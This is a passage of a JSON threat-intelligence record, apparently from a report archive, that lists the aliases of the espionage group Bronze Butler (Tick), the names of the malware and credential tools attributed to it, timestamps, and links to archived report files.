"Secureworks", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434573, "ts_updated_at": 1775826737, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/18f0b50c0651fbcca086d2a1154c5e0af48d9ca5.pdf", "text": "https://archive.orkl.eu/18f0b50c0651fbcca086d2a1154c5e0af48d9ca5.txt", "img": "https://archive.orkl.eu/18f0b50c0651fbcca086d2a1154c5e0af48d9ca5.jpg" } }